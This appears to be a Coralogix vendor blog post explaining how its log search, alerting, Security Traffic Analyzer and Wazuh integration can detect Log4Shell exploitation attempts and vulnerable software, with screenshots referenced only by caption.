Coralogix, unlike many traditional SIEMs, was not built to hold only “security-related events” (if that is even a thing) but rather to hold any type of textual data. This means that in most cases, it contains all the information and tools that you’ll need to detect security threats without having to do anything special except for creating simple alerting rules.

If you, like many of our customers, are sending your applications and servers logs to Coralogix, you can simply search for the string “JNDI” in your Internet-facing applications’ logs. If you find something like this, you should take a deeper look:

Coralogix logs

By simply clicking the “fwd” field and selecting “show graph for key,” you’ll see something that looks like this (all the masked items contained IPv4 addresses or comma-separated lists of IP addresses):

Field Visualization

That certainly looks suspicious. If you follow our recommendation to create a NewValue alert that will fire for every new value in that field that does not match the expected pattern (a collection of numbers, dots, and commas), then Coralogix will alert you about the attempt even before the attack was publicly disclosed. This includes even if the communication to the vulnerable service was encrypted.

Coralogix STA – Passive Mode

With Coralogix STA (Security Traffic Analyzer) installed, you’ll be able to dig even deeper. The STA allows you to analyze the traffic to and from EC2 interfaces and get all the essential information from it as logs in Coralogix. In this case, if the traffic to the server contained an attempt to exploit the Log4Shell vulnerability and it was not encrypted (or if it was encrypted but the STA’s configuration contained the key used to encrypt the traffic), Coralogix will automatically detect that and issue the following alert:

Coralogix Security Traffic Analyzer

Suppose the communication to the vulnerable server is encrypted, and the STA doesn’t have the appropriate key to decipher it. In that case, Suricata won’t be able to detect the JNDI payload in the traffic, and such alerts won’t fire. But even if you don’t send your application logs to Coralogix and the traffic to the Internet-facing service is encrypted, still not all is lost.

Coralogix might not be able to detect the attack before it starts, but the Coralogix STA can still detect the attack while it is in progress. As you may have already noticed, the way this vulnerability works is that the attacker will cause the server to contact an external server using the LDAP protocol, which will cause the server to create a DNS request. That DNS request will not be encrypted even if the connection to the server was.

This allows the STA to detect the call to the attacker’s command and control server, which can result from a Log4Shell attack but can detect other types of attacks.

Because this communication pattern contains a random string (the attack ID), it is most likely to get a relatively low NLP-based score. The queried domain name will be rather long, which will trigger the alert about suspicious domain names (that are both long but have a low NLP score). In addition to that, the relatively high number of such unique requests will probably trigger a Zeek notice about an increased number of unique queries per parent domain.

Coralogix STA – Active Mode

Another option to detect this vulnerability is by deploying Wazuh agents on critical servers and connecting them to the STA. The Wazuh agent will automatically pull the list of all installed software packages on the host and forward it to the STA, checking that information against a list of vulnerabilities published by NIST, RedHat, and Canonical. Also, Wazuh can be instructed to run an executable and parse its output. By configuring Wazuh to run a tool such as Grype, which analyses the library dependencies of every software it checks, it is possible to detect vulnerable software even before the first exploit attempt.

Some more logs…

Since outbound connections using the LDAP protocol are usually not allowed in corporate environments, the service will eventually fail to reach the relevant server. This will lead to many exceptions that will be logged as part of the service logs and will most likely cause a flow anomaly alert to fire in Coralogix.

Summary

Coralogix makes it possible to easily detect and investigate Log4Shell cases by either ingesting application, infrastructure, or STA logs. By combining this with an XSOAR integration, it is possible to take actions based on this detection and help prevent the attack from spreading.